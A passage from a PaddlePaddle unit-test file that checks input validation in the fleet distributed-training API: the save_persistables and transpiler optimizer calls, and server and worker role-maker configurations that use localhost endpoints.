feeded_var_names=['X'],
target_vars=[loss],
executor=exe,
main_program=compiled_prog)
self.assertRaises(Exception,
fleet.save_persistables,
executor=pe,
dirname='/tmp/')
self.assertRaises(Exception,
fleet.save_persistables,
executor="executor",
dirname='/tmp/')
self.assertRaises(Exception,
fleet.save_persistables,
executor=exe,
dirname='/tmp/',
main_program=compiled_prog)
self.assertRaises(Exception, fleet._transpile, "config")
def set_program(self, avg_cost, strategy):
with fluid.scope_guard(fluid.Scope()):
optimizer = fluid.optimizer.SGD(0.1)
optimizer = fleet.distributed_optimizer(optimizer, strategy)
optimizer.minimize(avg_cost)
def test_init_role(self):
role = role_maker.UserDefinedRoleMaker(
current_id=0,
role=role_maker.Role.SERVER,
worker_num=2,
server_endpoints=["127.0.0.1:36011", "127.0.0.1:36012"])
# for test optimizer without init(role)
# fleet.init(role)
batch_size = 128
is_sparse = True
is_distribute = False
strategy = DistributeTranspilerConfig()
strategy.sync_mode = False
strategy.geo_sgd_mode = True
strategy.geo_sgd_need_push_nums = 5
avg_cost, _, _ = train_network(batch_size, is_distribute, is_sparse)
self.assertRaises(Exception, self.set_program, avg_cost, strategy)
def test_transpile(self):
role = role_maker.UserDefinedRoleMaker(
current_id=0,
role=role_maker.Role.SERVER,
worker_num=2,
server_endpoints=["127.0.0.1:36011", "127.0.0.1:36012"])
# for test optimizer without init(role)
fleet.init(role)
batch_size = 128
is_sparse = True
is_distribute = False
strategy = DistributeTranspilerConfig()
strategy.sync_mode = False
strategy.runtime_split_send_recv = True
avg_cost, _, _ = train_network(batch_size, is_distribute, is_sparse)
self.set_program(avg_cost, strategy)
strategy.runtime_split_send_recv = False
self.set_program(avg_cost, strategy)
class TranspilerOptimizerTest(unittest.TestCase):
def testInvalidInputs(self):
self.assertRaises(Exception, TranspilerOptimizer, "Adam", None)
self.assertRaises(Exception, TranspilerOptimizer,
fluid.optimizer.Adam(0.001), "strategy")
transpiler = TranspilerOptimizer(fluid.optimizer.Adam(0.001))
self.assertRaises(Exception, transpiler.minimize, loss=[])
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
self.assertRaises(Exception,
transpiler.minimize,
loss=loss.name,
startup_program=[])
class UserDefinedRoleMakerTest(unittest.TestCase):
def createRoleMaker(self,
current_id=0,
role=Role.WORKER,
worker_num=1,
server_endpoints=["127.0.0.1:8080"]):
role = UserDefinedRoleMaker(current_id, role, worker_num,
server_endpoints)
def testRoleMaker(self):
self.createRoleMaker()
# test all invalid server_endpoints
self.assertRaises(
Exception, self.createRoleMaker,
server_endpoints=None) # server_endpoints must be as list
self.assertRaises(
Exception, self.createRoleMaker,
server_endpoints=[]) # server_endpoints can't be empty
self.assertRaises(Exception,
self.createRoleMaker,
server_endpoints=[
3, []
]) # element in server_endpoints must be as string
self.assertRaises(Exception,
self.createRoleMaker,
server_endpoints=[
"127.0.0.1:8080", "127.0.0.1:8080"
]) # element in server_endpoints can't be duplicate
# test all invalid current_id
self.assertRaises(Exception, self.createRoleMaker,
current_id="0") # current_id must be as int
self.assertRaises(
Exception, self.createRoleMaker,
current_id=-1) # current_id must be greater than or equal to 0
self.assertRaises(
Exception,
self.createRoleMaker,
current_id=1,
role=Role.SERVER,
server_endpoints=["127.0.0.1:8080"]
) # if role is server, current_id must be less than len(server_endpoints)
# test all invalid worker_num
self.assertRaises(Exception, self.createRoleMaker,
worker_num="1") # worker_num must be as int
self.assertRaises(Exception, self.createRoleMaker,
worker_num=0) # worker_num must be greater than 0
# test all invalid role
self.assertRaises(
Exception, self.createRoleMaker,
role=3) # role must be as Role(Role.WORKER=1, Role.SERVER=2)
class UserDefinedCollectiveRoleMakerTest(unittest.TestCase):
def createRoleMaker(self,
current_id=0,
worker_endpoints=["127.0.0.1:8080"]):
role = UserDefinedCollectiveRoleMaker(current_id, worker_endpoints)
def testRoleMaker(self):
self.createRoleMaker()
# test all invalid worker_endpoints
self.assertRaises(
Exception, self.createRoleMaker,
worker_endpoints=None) # worker_endpoints must be as list
self.assertRaises(
Exception, self.createRoleMaker,
worker_endpoints=[]) # worker_endpoints can't be empty
self.assertRaises(Exception,
self.createRoleMaker,
worker_endpoints=[
3, []
]) # element worker_endpoints must be as string
self.assertRaises(Exception,
self.createRoleMaker,
worker_endpoints=[
"127.0.0.1:8080", "127.0.0.1:8080"
]) # element in worker_endpoints can't be duplicate
# test all invalid current_id
self.assertRaises(Exception, self.createRoleMaker,
current_id="0") # current_id must be as int
self.assertRaises(
Exception, self.createRoleMaker,
current_id=-1) # current_id must be greater than or equal to 0
self.assertRaises(
Exception,
self.createRoleMaker,
current_id=1,
worker_endpoints=[
"127.0.0.1:8080"
]) # current_id must be less than len(worker_endpoints)
class CollectiveOptimizerTest(unittest.TestCase):
def test_ds_as_None(self):
optimizer = fluid.optimizer.AdamOptimizer()
dist_optimizer = CollectiveOptimizer(optimizer, strategy=None)
if __name__ == '__main__':
unittest.main()
| 41.505576 | 86 | 0.60215 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.